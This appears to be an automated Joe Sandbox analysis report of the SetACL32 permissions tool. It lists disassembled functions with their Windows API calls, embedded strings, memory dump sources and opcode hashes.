                • String ID: @M)w$netmsg.dll$pdh.dll
                • API String ID: 2660706180-3819766224
                • Opcode ID: b557519441872182f3b2864942e8769c2e5b0297d680d500f1d8106ae65f684b
                • Instruction ID: f8a968b868d156493d76e458066d30f9eeff86c2e6c081c6a043ef4c2960ec9c
                • Opcode Fuzzy Hash: b557519441872182f3b2864942e8769c2e5b0297d680d500f1d8106ae65f684b
                • Instruction Fuzzy Hash: 6DC116B0E002188BDB20DF14CC957AAB7B4EF44754F10429DE909E7281DF78AE85DFA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F88D30 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 285COMMON
                Download Yara Rule
                APIs
                • LookupAccountNameW.ADVAPI32(00000000,00FBC3E4,00000000,?,00000000,00F87EBC,?), ref: 00F88DAE
                • GetLastError.KERNEL32(?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88DBA
                • GetLastError.KERNEL32(?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88DC1
                • LookupAccountNameW.ADVAPI32(00000000,00000000,00000000,?,00000000,00F87EBC,?), ref: 00F88ED9
                • GetLastError.KERNEL32(?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88EE3
                • IsValidSid.ADVAPI32(00000000,000000FF,000000FD,?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88F25
                • IsValidSid.ADVAPI32(00000000,?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88F45
                • GetLengthSid.ADVAPI32(00000000,?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88F50
                • CopySid.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88F6F
                • Concurrency::cancel_current_task.LIBCPMT ref: 00F89001
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$AccountLookupNameValid$Concurrency::cancel_current_taskCopyLength
                • String ID: @M)w
                • API String ID: 2417659792-1211491014
                • Opcode ID: 44ed20a6c1ca6433928221a012bb27f6b8080352ff6b2dc5276fd16832dfcb90
                • Instruction ID: 1b4f0b5816026a1383f4a88fe88547ed26741c5db3ef88b0222b9524568d6793
                • Opcode Fuzzy Hash: 44ed20a6c1ca6433928221a012bb27f6b8080352ff6b2dc5276fd16832dfcb90
                • Instruction Fuzzy Hash: C391CFB2E002049FDB14EFA8DC85BEEB7B9EF48350F544529F905E7284DB709905EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F99760 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                • GetACP.KERNEL32(?,?,?,?,?,?,00F8FBD2,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F99821
                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00F8FBD2,?,?,?,00000055,?,-00000050,?,?), ref: 00F9984C
                • _wcschr.LIBVCRUNTIME ref: 00F998E0
                • _wcschr.LIBVCRUNTIME ref: 00F998EE
                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00F999AF
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                • String ID: utf8
                • API String ID: 4147378913-905460609
                • Opcode ID: b7dc67556d4df242cd1ac242c16c6480f4183ddfbd37320a8d03924a996e2222
                • Instruction ID: c0ec1aa1ce4f53fc41b50648d1823ccff4be3ae57e74c16ada2c9a86d96f26b9
                • Opcode Fuzzy Hash: b7dc67556d4df242cd1ac242c16c6480f4183ddfbd37320a8d03924a996e2222
                • Instruction Fuzzy Hash: 99710671A08306AAFF25AB79CC42BBA73ACEF45720F16442DF505DB181EAF4D940E761
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F96588 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32(?,?,00F96587,?,?,?,?), ref: 00F965AA
                • TerminateProcess.KERNEL32(00000000,?,00F96587,?,?,?,?), ref: 00F965B1
                • ExitProcess.KERNEL32 ref: 00F965C3
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Process$CurrentExitTerminate
                • String ID:
                • API String ID: 1703294689-0
                • Opcode ID: 72ed092cddcd9c54cd28b02e8964dd12c45c4d2ef8b1d4c7489ae003f155b12f
                • Instruction ID: 3c234db59ec296e8ceb4614ba8ead88b3f97071cd0a8f4b78bec4dd347b9e4a9
                • Opcode Fuzzy Hash: 72ed092cddcd9c54cd28b02e8964dd12c45c4d2ef8b1d4c7489ae003f155b12f
                • Instruction Fuzzy Hash: D0E04671400108AFEF112F24CC09A5C3B68EB55351B050010F804CA132CB39DD81EB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8BB7C Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_0003BB88,00F8AF4E), ref: 00F8BB81
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: d2e85e38cf1d78c7edcf4f5e03d801ca14aba95613f256c78a5974e65a1aa906
                • Instruction ID: 438b6a26dfa752df5609928d2c73b319d135e9519554d2cbfe2a716ee94eff4e
                • Opcode Fuzzy Hash: d2e85e38cf1d78c7edcf4f5e03d801ca14aba95613f256c78a5974e65a1aa906
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9CB4E Relevance: .0, Instructions: 29COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1e92dcea0e5f5e015b5c7cd50786aa359a0345e38aa1dac2c75e8e7df5a5821f
                • Instruction ID: 8fc2f5f2805ce65c74e4488b19fcf04e72d84015cdd0c658d8ea5dc88e13f818
                • Opcode Fuzzy Hash: 1e92dcea0e5f5e015b5c7cd50786aa359a0345e38aa1dac2c75e8e7df5a5821f
                • Instruction Fuzzy Hash: 83F03035A142249BDF26CB5CC907E5973A8EB45B72F154096E501D7151C374DD40DBD0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F7FDA5 Relevance: 35.6, APIs: 18, Strings: 2, Instructions: 551registryfileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNEL32(?,?,00000000,00000000,00000003,02200000,00000000), ref: 00F7FF15
                • GetKernelObjectSecurity.ADVAPI32(?,?,?,00000000,?), ref: 00F7FF82
                • GetLastError.KERNEL32 ref: 00F7FF9F
                • GetKernelObjectSecurity.ADVAPI32(?,?,00000000,?,?), ref: 00F7FFC0
                • MakeAbsoluteSD.ADVAPI32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?), ref: 00F800A3
                • GetLastError.KERNEL32 ref: 00F800AF
                • GetLastError.KERNEL32 ref: 00F800B6
                • CloseHandle.KERNEL32(00000000), ref: 00F7FFEB
                  • Part of subcall function 00F93434: _free.LIBCMT ref: 00F93447
                • RegCloseKey.ADVAPI32(?), ref: 00F7FFF9
                • GetNamedSecurityInfoW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,?), ref: 00F80027
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLastSecurity$CloseKernelObject$AbsoluteCreateFileHandleInfoMakeNamed_free
                • String ID: @M)w$SeSecurityPrivilege
                • API String ID: 896392196-2039830501
                • Opcode ID: 68cea7a69c76b8d2a578d7a36ba75851abe7be7cf8e8fbb3e5ac6a35b9653ba5
                • Instruction ID: d1d5243268df2a867aabc6a1bd8a78c8bf82dec6ab0ad309ce65dc3de85388de
                • Opcode Fuzzy Hash: 68cea7a69c76b8d2a578d7a36ba75851abe7be7cf8e8fbb3e5ac6a35b9653ba5
                • Instruction Fuzzy Hash: 3D12C1B1E003099BEF60DFA4CC85BEEBBB9AF04310F544529E505E7291DB74E948EB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F6E890 Relevance: 28.9, APIs: 3, Strings: 13, Instructions: 853COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00F698F0: EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F69982
                  • Part of subcall function 00F698F0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F699CB
                  • Part of subcall function 00F698F0: GetCurrentThreadId.KERNEL32 ref: 00F699EE
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A2A
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69A34
                • GetVersionExW.KERNEL32(?), ref: 00F6EAB3
                • GetVersionExW.KERNEL32(0000011C), ref: 00F6EACE
                • GetLastError.KERNEL32 ref: 00F6EAD8
                  • Part of subcall function 00F621B0: GetCurrentProcess.KERNEL32(00000028,?,746D712B), ref: 00F62208
                  • Part of subcall function 00F621B0: OpenProcessToken.ADVAPI32(00000000), ref: 00F6220F
                  • Part of subcall function 00F621B0: GetLastError.KERNEL32 ref: 00F62219
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A9B
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69AA5
                  • Part of subcall function 00F74BF0: std::locale::_Init.LIBCPMT ref: 00F75AA6
                Strings
                • Object path and/or object type not specified., xrefs: 00F6E8D5
                • Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00F6F004
                • Prepare, xrefs: 00F6E909, 00F6E9D4, 00F6EB25, 00F6EC31, 00F6EE34, 00F6F038, 00F6F23C
                • SeTakeOwnershipPrivilege, xrefs: 00F6F0F6
                • SeRestorePrivilege, xrefs: 00F6EEF2
                • Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00F6F208
                • @M)w, xrefs: 00F6EAD8
                • Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00F6EE00
                • The object type was not specified., xrefs: 00F6E9A0
                • SeBackupPrivilege, xrefs: 00F6ECEE
                • The version of your operating system could not be determined., xrefs: 00F6EAF1
                • +qmt, xrefs: 00F6F487
                • SetACL only supports Windows Vista and later., xrefs: 00F6EBFD
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$CurrentNameProcessTimeUserVersion$CriticalEnterFileInitOpenSectionSystemThreadTokenstd::locale::_
                • String ID: +qmt$@M)w$Object path and/or object type not specified.$Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeBackupPrivilege$SeRestorePrivilege$SeTakeOwnershipPrivilege$SetACL only supports Windows Vista and later.$The object type was not specified.$The version of your operating system could not be determined.
                • API String ID: 182104191-3836827182
                • Opcode ID: 8178809b45810c718b29fbb2eda7387d29f30890ff4e7b0cdbe3344125d5cb40
                • Instruction ID: 15835e285ee5bdccb13e6a1c1472b0256ed940abfb300f41a40303070600ab11
                • Opcode Fuzzy Hash: 8178809b45810c718b29fbb2eda7387d29f30890ff4e7b0cdbe3344125d5cb40
                • Instruction Fuzzy Hash: 3C62C271A10209DBEF08DFA4CC85BDEBB76BF44314F248218E404BB2D5DB79AA48DB55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8B35F Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                Download Yara Rule
                APIs
                • InitializeCriticalSectionAndSpinCount.KERNEL32(00FCAA14,00000FA0,?,?,00F8B33D), ref: 00F8B36B
                • GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,00F8B33D), ref: 00F8B376
                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00F8B33D), ref: 00F8B387
                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F8B399
                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F8B3A7
                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00F8B33D), ref: 00F8B3CA
                • DeleteCriticalSection.KERNEL32(00FCAA14,00000007,?,?,00F8B33D), ref: 00F8B3E6
                • CloseHandle.KERNEL32(00000000,?,?,00F8B33D), ref: 00F8B3F6
                Strings
                • WakeAllConditionVariable, xrefs: 00F8B39F
                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00F8B371
                • kernel32.dll, xrefs: 00F8B382
                • SleepConditionVariableCS, xrefs: 00F8B393
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                • API String ID: 2565136772-3242537097
                • Opcode ID: e89dc4aec195ae39ba9fa3c0ca3d2bf66f42e2651fa05b0a24f3c6e3bf782b23
                • Instruction ID: a21fca0cf72158ca155e78ec5bc05c8533a183e8a8ca26ab0693fc86bd833e62
                • Opcode Fuzzy Hash: e89dc4aec195ae39ba9fa3c0ca3d2bf66f42e2651fa05b0a24f3c6e3bf782b23
                • Instruction Fuzzy Hash: 0C01B5F1E8171AEBD7216BB5AE0EF963A989B427117040021F906E6250DBB8D804FB73
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F87950 Relevance: 16.3, APIs: 8, Strings: 1, Instructions: 566COMMON
                Download Yara Rule
                APIs
                • ConvertStringSidToSidW.ADVAPI32(00FBC3E4,?), ref: 00F879BE
                • IsValidSid.ADVAPI32(?), ref: 00F879D3
                • GetLengthSid.ADVAPI32(?), ref: 00F879DE
                • CopySid.ADVAPI32(00000000,00000000,?), ref: 00F879FA
                • LocalFree.KERNEL32(?), ref: 00F87A1D
                  • Part of subcall function 00F93434: _free.LIBCMT ref: 00F93447
                • std::locale::_Init.LIBCPMT ref: 00F87C9A
                • DsGetDcNameW.NETAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F87D73
                • NetApiBufferFree.NETAPI32(?), ref: 00F87DEA
                  • Part of subcall function 00F88D30: LookupAccountNameW.ADVAPI32(00000000,00FBC3E4,00000000,?,00000000,00F87EBC,?), ref: 00F88DAE
                  • Part of subcall function 00F88D30: GetLastError.KERNEL32(?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88DBA
                  • Part of subcall function 00F88D30: GetLastError.KERNEL32(?,?,?,?,00000000,00FACD15,000000FF,?,00F87EBC,00000000,?), ref: 00F88DC1
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorFreeLastName$AccountBufferConvertCopyInitLengthLocalLookupStringValid_freestd::locale::_
                • String ID: computername
                • API String ID: 287987163-1800712684
                • Opcode ID: 33cc195978babe46b796fdf673d1018e94c5d731c900af4b76a4da678690ec7a
                • Instruction ID: cee6c1e684c6cfa77ff971e2cbb86f6caba31b07417cdcde8cb20f33626ac8f2
                • Opcode Fuzzy Hash: 33cc195978babe46b796fdf673d1018e94c5d731c900af4b76a4da678690ec7a
                • Instruction Fuzzy Hash: 6222E171E002488FDF14EFA4CC85BDEBBB6FF84314F244158E405AB295DB39AA89DB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9A48C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 77COMMONLIBRARYCODE
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID:
                • String ID: @M)w$api-ms-$ext-ms-
                • API String ID: 0-2512018096
                • Opcode ID: b8ad5bb8d9e93294b282acbf47025c1dcf7ea0b70fba20ba82273a0022f216a6
                • Instruction ID: caf68081651795a45336b66d0047a47633faa9cb89fae9f9bca3f5f019b7ff22
                • Opcode Fuzzy Hash: b8ad5bb8d9e93294b282acbf47025c1dcf7ea0b70fba20ba82273a0022f216a6
                • Instruction Fuzzy Hash: BB21DA72F01624EBEF329B24DC85B6A77589F417B0F2A4121FD06A7291DA70DD00B6E2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9036B Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00F97220: GetLastError.KERNEL32(?,?,?,00F94163,00FC7070,0000000C), ref: 00F97225
                  • Part of subcall function 00F97220: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00F94163,00FC7070,0000000C), ref: 00F972C3
                • _free.LIBCMT ref: 00F90678
                • _free.LIBCMT ref: 00F90691
                • _free.LIBCMT ref: 00F906CF
                • _free.LIBCMT ref: 00F906D8
                • _free.LIBCMT ref: 00F906E4
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$ErrorLast
                • String ID: C
                • API String ID: 3291180501-1037565863
                • Opcode ID: 718f83b2fbf309070b11ed147d8bb3428266fecfe249fedb710458ef446dbc64
                • Instruction ID: c04fc87948c59189bdad014c72e46f1244bcd9971d60d93e32176cb3aa677c38
                • Opcode Fuzzy Hash: 718f83b2fbf309070b11ed147d8bb3428266fecfe249fedb710458ef446dbc64
                • Instruction Fuzzy Hash: 9AB13775A012199FEF24DF18CC84AADB3B5FF48314F1045AAE949A7390DB71AE90DF40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8FEE0 Relevance: 7.7, APIs: 5, Instructions: 186COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00F98049: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00F9DAF3,?,00000000,?,00FA0312,?,00000004,?,?,?,?,00F96975), ref: 00F9807B
                • _free.LIBCMT ref: 00F8FFEF
                • _free.LIBCMT ref: 00F90006
                • _free.LIBCMT ref: 00F90023
                • _free.LIBCMT ref: 00F9003E
                • _free.LIBCMT ref: 00F90055
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$AllocateHeap
                • String ID:
                • API String ID: 3033488037-0
                • Opcode ID: c03d8e7e564e3b38a85af985c2053769c324c33fddf1474037eb1178e72c208f
                • Instruction ID: 3759395b7158d61b70ca11e5924aebffcea47fa6a1a7389577ca75bc4b6989c5
                • Opcode Fuzzy Hash: c03d8e7e564e3b38a85af985c2053769c324c33fddf1474037eb1178e72c208f
                • Instruction Fuzzy Hash: CB51B332A00705AFEF20DF29CC41BAA77F5EF59720B140669E509DB2A1EB35D945EB40
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F69500 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 192registryCOMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32 ref: 00F69535
                • LeaveCriticalSection.KERNEL32(00FCB6D4), ref: 00F6973F
                  • Part of subcall function 00F69780: EnterCriticalSection.KERNEL32 ref: 00F697B8
                  • Part of subcall function 00F69780: LeaveCriticalSection.KERNEL32(00FCB6D4,?,?), ref: 00F69880
                  • Part of subcall function 00F62DD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?), ref: 00F62E67
                • RegisterEventSourceW.ADVAPI32(00000000,00000000), ref: 00F696A6
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalSection$EnterLeave$EventFileModuleNameRegisterSource
                • String ID: DefaultEventSource
                • API String ID: 3706164908-1672983561
                • Opcode ID: 6c5bd5ee9480791a2ad8b0a8d1ef1a45e6aa9e40dd38d28c833d5a50e459f7dd
                • Instruction ID: f851197862b8d2519ae29a967ce630558f058ed421d6ad2bd91d2124eb54b24d
                • Opcode Fuzzy Hash: 6c5bd5ee9480791a2ad8b0a8d1ef1a45e6aa9e40dd38d28c833d5a50e459f7dd
                • Instruction Fuzzy Hash: E8613571A042099BDF04EFB4CD86BDDB779FB44310F144629F401E7292DBB99A44EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F9429A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51threadCOMMON
                Download Yara Rule
                APIs
                • CreateThread.KERNELBASE(00000000,00FC9A90,Function_0004413E,00000000,00000000,00000000), ref: 00F942E3
                • GetLastError.KERNEL32(?,?,?,?,00F696C8,00000000,00000000), ref: 00F942EF
                • __dosmaperr.LIBCMT ref: 00F942F6
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
